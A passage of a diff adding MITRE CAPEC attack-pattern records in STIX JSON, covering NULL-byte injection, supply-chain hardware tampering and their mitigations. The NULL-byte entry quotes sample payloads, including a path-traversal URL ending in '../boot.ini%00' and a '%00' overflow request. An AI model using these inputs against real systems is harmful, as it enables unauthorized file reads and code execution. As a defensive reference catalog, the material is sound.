"course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--133b4c1d-e9fa-451c-aa3f-f35f367c171d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c488b2c-85cb-4c5b-9009-fa3d351a1e2b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1b1d403f-8208-4c4f-a659-3772b9f22687", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).", + "external_references": [ + { + "external_id": "CAPEC-52", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/52.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Null Byte Injection", + "external_id": "28", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Null-Byte-Injection" + }, + { + "description": "Embedding Null Code", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Embedding_Null_Code" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability, iDefense Labs Public Advisory, 2004--08---13, Verisign, Inc.", + "external_id": "REF-445", + "source_name": "reference_from_CAPEC", + "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126" + }, + { + "description": "PHP Input Validation Vulnerabilities, Bugtraq mailing list archive", + "external_id": "REF-446", + "source_name": "reference_from_CAPEC", + "url": "http://msgs.securepoint.com/bugtraq/" + } + ], + "id": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Embedding NULL Bytes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Directory Browsing\n Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an adversary could insert a bogus username such as ../../../../../WINDOWS. 
If the adversary needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. Alternatively the adversary might apply the postfix NULL character (%00) to determine whether this terminates the string.\n Different forms of NULL to think about include\n PATH%00PATH[0x00]PATH[alternate representation of NULL character]%00\n ", + "\n Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote adversaries to execute arbitrary code.\n The problem specifically exists upon retrieving a link of the following form:\n GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1\n Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \"file not found\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an adversary to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:\n 0x77F83AE5 MOV EAX,[EDI+8]0x77F83AE8 MOV ECX,[EDI+C]...0x77F83AED MOV [ECX],EAX\n The register EDI contains a pointer to a user-supplied string. The adversary therefore has control over both the ECX and EAX registers used in the shown MOV instruction.\n Successful exploitation allows remote adversaries to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. 
Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.\n An adversary does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.\n Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445].See also: CVE-2004-0629", + "\n Consider the following PHP script:\n $whatever = addslashes($_REQUEST['whatever']);include(\"/path/to/program/\" . $whatever . \"/header.htm\");\n A malicious adversary might open the following URL, disclosing the boot.ini file:\n http://localhost/phpscript.php?whatever=../../../../boot.ini%00\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

  2. Techniques
    Try different encodings for null such as \\0 or %00

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) such that they remove data after the null byte(s) in a way that is beneficial to them.

  2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The program does not properly handle postfix NULL terminators" + ], + "x_capec_skills_required": { + "High": "Execution of arbitrary code", + "Medium": "Directory traversal" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.", + "id": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-52-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--947c7cf0-0535-44ac-b13f-ddb607cc9a9c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "spec_version": "2.1", + "target_ref": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. 
The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-520", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/520.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. 
Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Hardware Component Inserted During Product Assembly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "\n A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The adversary constructs a counterfeit card that functions normally except that packets from the adversary's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the adversary to bypass the firewall unrestricted.\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. 
The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate manufacturer or manufacturer's supplier." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d2ec83e-7f8f-4432-9ab1-78af8ba6a895", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--62164250-4c65-4a4d-b6db-0f1e9fd43d4f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--201cded3-e9d5-4558-8d0b-11b70dfbb31a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a 
manufacturer's hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-521", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/521.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Hardware Design Specifications Are Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \"cores\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--232f172a-e624-4b85-b24e-42010deaa829", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39203ce0-f720-4381-82bc-7ef976ea1f67", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9239bace-f868-43d4-9499-32436d123f29", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73386060-fc29-4295-9736-a0468733e412", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e23fda25-c33c-4a99-a18b-62e8f434859e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--88547ca9-12fc-44e8-95b4-1e01d87849eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-522", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/522.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Hardware Component Replacement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "During shipment the adversary is able to intercept a system that has been purchased by the victim, and replaces a math 
processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the adversary to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target Hardware: The adversary must first identify a system that they wish to target, and a specific hardware component that they can swap out with a malicious replacement.

  2. Techniques
    Look for datasheets containing the system schematics that can help identify possible target hardware.
    Procure a system and inspect it manually, looking for possible hardware component targets. Search for manufacturer IDs on hardware chips or FCC IDs on wireless chips to determine their functionality.
  3. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

  4. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test a Malicious Component Replacement: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

  2. Techniques
    Design a malicious hardware component that will perform the same functionality as the target component, but also contains additional functionality.
    Obtain already designed malicious components that just need to be placed into the system.

Exploit

  1. Substitute Components in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary substitutes the malicious component for the targeted component. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.", + "id": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e5d22fb-9a7a-4510-9013-518caaabf8fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "spec_version": "2.1", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.", + "id": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + 
"modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13c57eb4-2ac4-4e73-9f83-5f22cf4194c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "spec_version": "2.1", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering.", + "id": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b9712253-4163-4fb1-aca0-1392d19779d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-523", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/523.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Implanted", + "object_marking_refs": [ + 